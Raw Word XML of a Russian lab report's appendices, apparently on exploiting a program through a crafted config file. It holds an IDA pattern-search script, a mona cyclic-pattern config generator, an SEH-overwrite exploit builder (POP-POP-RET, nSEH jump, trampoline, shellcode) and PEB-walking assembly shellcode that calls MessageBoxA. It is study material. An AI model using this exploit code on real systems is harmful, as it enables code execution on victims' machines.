      <w:r w:rsidRPr="00127358">
        <w:rPr>
          <w:color w:val="0033B3"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">return </w:t>
      </w:r>
      <w:r w:rsidRPr="00127358">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>results</w:t>
      </w:r>
      <w:r w:rsidRPr="00127358">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00127358">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00127358">
        <w:rPr>
          <w:color w:val="0033B3"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">def </w:t>
      </w:r>
      <w:r w:rsidRPr="00127358">
        <w:rPr>
          <w:color w:val="00627A"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>main</w:t>
      </w:r>
      <w:r w:rsidRPr="00127358">
        <w:rPr>
          <w:color w:val="080808"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>():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0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">segs </w:t>
      </w:r>
      <w:r w:rsidRPr="00127358">
        <w:rPr>
          <w:color w:val="080808"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>= find_module_segments(</w:t>
      </w:r>
      <w:r w:rsidRPr="00127358">
        <w:rPr>
          <w:color w:val="067D17"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"func.dll"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0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">exec_segs </w:t>
      </w:r>
      <w:r w:rsidRPr="00127358">
        <w:rPr>
          <w:color w:val="080808"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>= [</w:t>
      </w:r>
      <w:r w:rsidRPr="00127358">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">s </w:t>
      </w:r>
      <w:r w:rsidRPr="00127358">
        <w:rPr>
          <w:color w:val="0033B3"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">for </w:t>
      </w:r>
      <w:r w:rsidRPr="00127358">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">s </w:t>
      </w:r>
      <w:r w:rsidRPr="00127358">
        <w:rPr>
          <w:color w:val="0033B3"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">in </w:t>
      </w:r>
      <w:r w:rsidRPr="00127358">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">segs </w:t>
      </w:r>
      <w:r w:rsidRPr="00127358">
        <w:rPr>
          <w:color w:val="0033B3"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">if </w:t>
      </w:r>
      <w:r w:rsidRPr="00127358">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="00127358">
        <w:rPr>
          <w:color w:val="080808"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.perm &amp; ida_segment.SEGPERM_EXEC]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33B3"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">if not </w:t>
      </w:r>
      <w:r w:rsidRPr="00127358">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>exec_segs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0080"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>print</w:t>
      </w:r>
      <w:r w:rsidRPr="00127358">
        <w:rPr>
          <w:color w:val="080808"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00127358">
        <w:rPr>
          <w:color w:val="067D17"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"No executable segments found in"</w:t>
      </w:r>
      <w:r w:rsidRPr="00127358">
        <w:rPr>
          <w:color w:val="080808"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, TARGET_MODULE)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33B3"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>return</w:t>
      </w:r>
      <w:r w:rsidRPr="00127358">
        <w:rPr>
          <w:color w:val="0033B3"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00127358">
        <w:rPr>
          <w:color w:val="000080"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>print</w:t>
      </w:r>
      <w:r w:rsidRPr="00127358">
        <w:rPr>
          <w:color w:val="080808"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00127358">
        <w:rPr>
          <w:color w:val="067D17"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"Found executable segments:"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33B3"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">for </w:t>
      </w:r>
      <w:r w:rsidRPr="00127358">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">seg </w:t>
      </w:r>
      <w:r w:rsidRPr="00127358">
        <w:rPr>
          <w:color w:val="0033B3"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">in </w:t>
      </w:r>
      <w:r w:rsidRPr="00127358">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>exec_segs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0080"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>print</w:t>
      </w:r>
      <w:r w:rsidRPr="00127358">
        <w:rPr>
          <w:color w:val="080808"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00127358">
        <w:rPr>
          <w:color w:val="067D17"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">"  %s 0x%08X-0x%08X" </w:t>
      </w:r>
      <w:r w:rsidRPr="00127358">
        <w:rPr>
          <w:color w:val="080808"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>% (</w:t>
      </w:r>
      <w:r w:rsidRPr="00127358">
        <w:rPr>
          <w:color w:val="080808"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">            ida_segment.get_segm_name(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),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.start_ea,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>.end_ea,</w:t>
      </w:r>
      <w:r w:rsidRPr="00127358">
        <w:rPr>
          <w:color w:val="080808"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        ))</w:t>
      </w:r>
      <w:r w:rsidRPr="00127358">
        <w:rPr>
          <w:color w:val="080808"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00127358">
        <w:rPr>
          <w:color w:val="0033B3"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">for </w:t>
      </w:r>
      <w:r w:rsidRPr="00127358">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>name</w:t>
      </w:r>
      <w:r w:rsidRPr="00127358">
        <w:rPr>
          <w:color w:val="080808"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00127358">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">pat </w:t>
      </w:r>
      <w:r w:rsidRPr="00127358">
        <w:rPr>
          <w:color w:val="0033B3"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">in </w:t>
      </w:r>
      <w:r w:rsidRPr="00127358">
        <w:rPr>
          <w:color w:val="080808"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>patterns.items():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0080"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>print</w:t>
      </w:r>
      <w:r w:rsidRPr="00127358">
        <w:rPr>
          <w:color w:val="080808"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00127358">
        <w:rPr>
          <w:color w:val="067D17"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"Searching for:"</w:t>
      </w:r>
      <w:r w:rsidRPr="00127358">
        <w:rPr>
          <w:color w:val="080808"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00127358">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>name</w:t>
      </w:r>
      <w:r w:rsidRPr="00127358">
        <w:rPr>
          <w:color w:val="080808"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00127358">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>pat</w:t>
      </w:r>
      <w:r w:rsidRPr="00127358">
        <w:rPr>
          <w:color w:val="080808"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.hex())</w:t>
      </w:r>
      <w:r w:rsidRPr="00127358">
        <w:rPr>
          <w:color w:val="080808"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00127358">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">found_any </w:t>
      </w:r>
      <w:r w:rsidRPr="00127358">
        <w:rPr>
          <w:color w:val="080808"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r w:rsidRPr="00127358">
        <w:rPr>
          <w:color w:val="0033B3"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>False</w:t>
      </w:r>
      <w:r w:rsidRPr="00127358">
        <w:rPr>
          <w:color w:val="0033B3"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        for </w:t>
      </w:r>
      <w:r w:rsidRPr="00127358">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">seg </w:t>
      </w:r>
      <w:r w:rsidRPr="00127358">
        <w:rPr>
          <w:color w:val="0033B3"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">in </w:t>
      </w:r>
      <w:r w:rsidRPr="00127358">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>exec_segs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0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">addrs </w:t>
      </w:r>
      <w:r w:rsidRPr="00127358">
        <w:rPr>
          <w:color w:val="080808"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>= search_pattern(</w:t>
      </w:r>
      <w:r w:rsidRPr="00127358">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>seg</w:t>
      </w:r>
      <w:r w:rsidRPr="00127358">
        <w:rPr>
          <w:color w:val="080808"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00127358">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>pat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33B3"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">for </w:t>
      </w:r>
      <w:r w:rsidRPr="00127358">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">ea </w:t>
      </w:r>
      <w:r w:rsidRPr="00127358">
        <w:rPr>
          <w:color w:val="0033B3"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">in </w:t>
      </w:r>
      <w:r w:rsidRPr="00127358">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>addrs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        </w:t>
      </w:r>
      <w:r w:rsidRPr="00127358">
        <w:rPr>
          <w:color w:val="000080"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>print</w:t>
      </w:r>
      <w:r w:rsidRPr="00127358">
        <w:rPr>
          <w:color w:val="080808"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00127358">
        <w:rPr>
          <w:color w:val="067D17"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">"  %s found at 0x%08X" </w:t>
      </w:r>
      <w:r w:rsidRPr="00127358">
        <w:rPr>
          <w:color w:val="080808"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>% (</w:t>
      </w:r>
      <w:r w:rsidRPr="00127358">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>name</w:t>
      </w:r>
      <w:r w:rsidRPr="00127358">
        <w:rPr>
          <w:color w:val="080808"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00127358">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ea</w:t>
      </w:r>
      <w:r w:rsidRPr="00127358">
        <w:rPr>
          <w:color w:val="080808"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>))</w:t>
      </w:r>
      <w:r w:rsidRPr="00127358">
        <w:rPr>
          <w:color w:val="080808"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">                </w:t>
      </w:r>
      <w:r w:rsidRPr="00127358">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">found_any </w:t>
      </w:r>
      <w:r w:rsidRPr="00127358">
        <w:rPr>
          <w:color w:val="080808"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r w:rsidRPr="00127358">
        <w:rPr>
          <w:color w:val="0033B3"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>True</w:t>
      </w:r>
      <w:r w:rsidRPr="00127358">
        <w:rPr>
          <w:color w:val="0033B3"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        if not </w:t>
      </w:r>
      <w:r w:rsidRPr="00127358">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>found_any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        </w:t>
      </w:r>
      <w:r w:rsidRPr="00127358">
        <w:rPr>
          <w:color w:val="000080"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>print</w:t>
      </w:r>
      <w:r w:rsidRPr="00127358">
        <w:rPr>
          <w:color w:val="080808"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00127358">
        <w:rPr>
          <w:color w:val="067D17"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"  not found"</w:t>
      </w:r>
      <w:r w:rsidRPr="00127358">
        <w:rPr>
          <w:color w:val="080808"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00127358">
        <w:rPr>
          <w:color w:val="080808"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00127358">
        <w:rPr>
          <w:color w:val="080808"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00127358">
        <w:rPr>
          <w:color w:val="0033B3"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">if </w:t>
      </w:r>
      <w:r w:rsidRPr="00127358">
        <w:rPr>
          <w:color w:val="080808"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">__name__ == </w:t>
      </w:r>
      <w:r w:rsidRPr="00127358">
        <w:rPr>
          <w:color w:val="067D17"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"__main__"</w:t>
      </w:r>
      <w:r w:rsidRPr="00127358">
        <w:rPr>
          <w:color w:val="080808"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00127358">
        <w:rPr>
          <w:color w:val="080808"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    main()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A0FD67C" w14:textId="7BFC7EF1" w:rsidR="00A7159A" w:rsidRDefault="00A7159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09ED585" w14:textId="046D63CF" w:rsidR="00127358" w:rsidRDefault="00A7159A" w:rsidP="00A7159A">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="851"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Приложение 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="739AAA6D" w14:textId="4FDB5023" w:rsidR="00A7159A" w:rsidRDefault="00A7159A" w:rsidP="00A7159A">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Python</w:t>
      </w:r>
      <w:r w:rsidRPr="00A7159A">
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t>скрипт для создания конфига с паттерном</w:t>
      </w:r>
      <w:r w:rsidRPr="00A7159A">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="115F2A2D" w14:textId="65750D6F" w:rsidR="00A7159A" w:rsidRPr="00A7159A" w:rsidRDefault="00A7159A" w:rsidP="00A715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struct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def </w:t>
      </w:r>
      <w:r w:rsidRPr="00A7159A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create_exploit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output_file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"config_11_exploit"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):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A7159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"config_11"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"rb"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config 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7159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bytearray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.read())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18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 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0x00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19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 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0xAA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config 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[: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54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+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A7159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output_file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"wb"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.write(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</w:rPr>
        <w:t>Размер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</w:rPr>
        <w:t>паттерна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</w:t>
      </w:r>
      <w:r w:rsidRPr="00A7159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A7159A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7159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A7159A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</w:rPr>
        <w:t>байт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</w:r>
      <w:r w:rsidRPr="00A7159A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br/>
        <w:t xml:space="preserve">if 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"__main__"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pattern_for_search = </w:t>
      </w:r>
      <w:r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t>b"Aa...4Ej5Ej6Ej7Ej8</w:t>
      </w:r>
      <w:r w:rsidRPr="00A7159A"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t>k3Ek4Ek5Ek"</w:t>
      </w:r>
      <w:r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t xml:space="preserve"> // pattern from mona</w:t>
      </w:r>
      <w:r w:rsidRPr="00A7159A"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br/>
        <w:t xml:space="preserve">    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pattern_for_search = pattern_for_search[:</w:t>
      </w:r>
      <w:r w:rsidRPr="00A7159A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4000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create_exploit(pattern_for_search, </w:t>
      </w:r>
      <w:r w:rsidRPr="00A7159A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"config_11_test"</w:t>
      </w:r>
      <w:r w:rsidRPr="00A7159A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</w:p>
    <w:p w14:paraId="2B9E2B67" w14:textId="3169AC5E" w:rsidR="00416838" w:rsidRDefault="00416838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3E064CE5" w14:textId="3A282668" w:rsidR="00A7159A" w:rsidRDefault="00416838" w:rsidP="00416838">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="851"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Приложение 4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3156335B" w14:textId="597E7652" w:rsidR="00416838" w:rsidRDefault="00416838" w:rsidP="00416838">
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Python</w:t>
      </w:r>
      <w:r w:rsidRPr="00416838">
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t>скрипт для создания конфига с шеллкодом:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="145B97D6" w14:textId="77777777" w:rsidR="00416838" w:rsidRPr="00416838" w:rsidRDefault="00416838" w:rsidP="004168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41683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struct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POP_POP_RET =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0x625012f3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NSEH_OFFSET =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3328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nseh = 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</w:rPr>
        <w:t>b"</w:t>
      </w:r>
      <w:r w:rsidRPr="00416838">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="0037A6"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\xeb\x06\x90\x90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</w:rPr>
        <w:t>"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seh  = struct.pack(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</w:rPr>
        <w:t>"&lt;I"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, POP_POP_RET)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trampoline =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</w:rPr>
        <w:t>bytes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0xEB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0x08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              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jmp short +8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0x58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                    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pop eax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0x66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0x2D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0x17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0x0D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 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sub ax, 0x0D17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0xFF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0xE0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              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jmp eax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0x90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                    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nop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0xE8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0xF3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0xFF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>0xFF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</w:rPr>
        <w:t xml:space="preserve">0xFF  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 call -13</w:t>
      </w:r>
      <w:r w:rsidRPr="00416838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def </w:t>
      </w:r>
      <w:r w:rsidRPr="00416838">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="00627A"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>create_exploit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</w:rPr>
        <w:t>shellcode_bytes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</w:rPr>
        <w:t>output_file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</w:rPr>
        <w:t>"config_11_exploit"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>):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assert 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</w:rPr>
        <w:t>b"</w:t>
      </w:r>
      <w:r w:rsidRPr="00416838">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="0037A6"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\x00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</w:rPr>
        <w:t xml:space="preserve">" </w:t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not in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</w:rPr>
        <w:t>shellcode_bytes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</w:rPr>
        <w:t>"null-байты в шеллкоде!"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padding  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t>b"</w:t>
      </w:r>
      <w:r w:rsidRPr="00416838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\x90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t xml:space="preserve">"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* (NSEH_OFFSET -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shellcode_bytes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after_pad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t>b"</w:t>
      </w:r>
      <w:r w:rsidRPr="00416838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\x90</w:t>
      </w:r>
      <w:r w:rsidRPr="00416838">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="8A822D"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">"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* (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42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(trampoline))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pattern  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shellcode_bytes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padding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nseh + seh + trampoline +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after_pad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"config_11"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"rb"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config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bytearray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.read())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18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0x00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19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= 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0xAA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config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[:</w:t>
      </w:r>
      <w:r w:rsidRPr="00416838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54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+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pattern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output_file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"wb"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.write(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bytes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config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print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f"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</w:rPr>
        <w:t>Готово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: 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</w:rPr>
        <w:t>шеллкод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416838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{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len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shellcode_bytes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16838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}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 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</w:rPr>
        <w:t>байт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with </w:t>
      </w:r>
      <w:r w:rsidRPr="00416838">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>open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"shellcode.bin"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416838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"rb"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16838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as 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f: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shellcode = f.read()</w:t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16838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create_exploit(shellcode)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41DF0FC4" w14:textId="769D2196" w:rsidR="00416838" w:rsidRDefault="00416838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051E5C46" w14:textId="727DA153" w:rsidR="00416838" w:rsidRPr="00B27B02" w:rsidRDefault="00416838" w:rsidP="00416838">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="851"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Приложение</w:t>
      </w:r>
      <w:r w:rsidRPr="00B27B02">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58A2F36D" w14:textId="24363AC9" w:rsidR="00416838" w:rsidRDefault="00416838" w:rsidP="00416838">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Ассемблерный</w:t>
      </w:r>
      <w:r w:rsidRPr="00B27B02">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>шеллкод</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BA77997" w14:textId="77777777" w:rsidR="00447612" w:rsidRPr="00447612" w:rsidRDefault="00447612" w:rsidP="004476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use32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start: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pushad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ebp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ebp, esp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sub esp,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h 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выделить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36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байт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для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локальных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переменных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база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kernel32, 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имя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функции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,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;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]=Ordinal,       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]=NamePtr,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;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]=AddrTable,     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]=LoadLibraryA,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;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база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user32,   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]=MessageBoxA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    ;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]=ExitProcess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Найти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kernel32.dll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через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PEB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esi, esi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ebx, [fs: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h + esi]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загружаем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ebx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адрес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PEB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ebx, [ebx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0x0C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; PEB_LDR_DATA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ebx, [ebx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0x14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; InMemoryOrderModuleList (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двусвязный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список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всех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dll)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ebx, [ebx]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второй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эл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-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списка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ntdll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ebx, [ebx]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третий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kernel32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ebx, [ebx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0x10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; ImageBase kernel32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ebx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сохр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базу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kernel32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Найти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LoadLibraryA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kernel32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esi, esi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esi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0x41797261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"aryA"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0x7262694C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"Libr"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0x64616F4C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"Load"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esp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eax, [ebx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Ch]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смещение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PE-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заголовка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eax, ebx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абсолютный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адрес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PE-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заголовка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eax,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h]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смещение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Export Directory (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из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Optional Header)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eax, ebx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абсолютный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адрес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Export Directory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ecx,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h] ; ECX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смещение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таблицы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Ordinal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</w:rPr>
        <w:t>ов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add ecx,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ecx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edi,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h] ; EDI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смещение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таблицы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имён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edi,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edi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Ch] ; EDX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смещение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таблицы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адресов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edx,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edx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h] ; EDX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количество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функций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(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счётчик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цикла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.loop1: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edi,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; EDI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таблица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имён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esi,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; ESI =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"LoadLibraryA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xor ecx, ecx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cl,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0x0E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ECX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14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dec ecx ; ECX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13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длина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"LoadLibraryA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cld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флаг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направления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вперёд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(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для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cmpsb)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edi, [edi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; EDI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смещение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имени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функции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edi,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repe cmpsb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сравниваем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ECX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байт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[ESI]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vs [EDI]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jz start.found1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inc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cmp eax, edx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jb start.loop1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.found1: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ecx,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; ECX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таблица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Ordinal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</w:rPr>
        <w:t>ов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mov edx,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 ; EDX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таблица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адресов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movzx eax, word [ecx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; EAX = ordinal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функции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(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2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байта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eax, [edx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; EAX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относительный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адреса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функции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eax,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Найти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ExitProcess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kernel32 (ebx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всё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ещё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kernel32)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0x58737365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"essX"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'X'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чтоб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дозаполнить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сравниваем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только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11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байт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0x636F7250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"Proc"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0x74697845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"Exit"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esp     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указатель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"ExitProcess..."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mov eax, [ebx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eax,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eax,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eax,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ecx,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ecx,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ecx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edi,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edi,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edi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edx,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edx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.loop_exit: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edi,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esi,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xor ecx, ecx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cld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edi, [edi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edi,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cx,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0x0B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 len(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"ExitProcess"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11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repe cmpsb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jz start.found_exit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inc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cmp eax, edx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jb start.loop_exit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.found_exit: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ecx,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edx,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movzx eax, word [ecx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eax, [edx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eax,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eax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сохранили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адрес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ExitProcess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esp,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Ch         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убрали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"ExitProcess..."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DWORD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12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байт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add esp,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h         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убрали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"LoadLibraryA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DWORD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16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байт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LoadLibraryA(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"user32.dll"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al,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0x6C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'l'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shl eax,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8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сдвиг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0x0000006C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→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0x00006C00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mov al,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0x6C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'l'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→ EAX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0x00006C6C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"ll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eax    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кладём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"ll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0x642E3233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"23.d"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0x72657375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"user"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esp    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аргумент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</w:rPr>
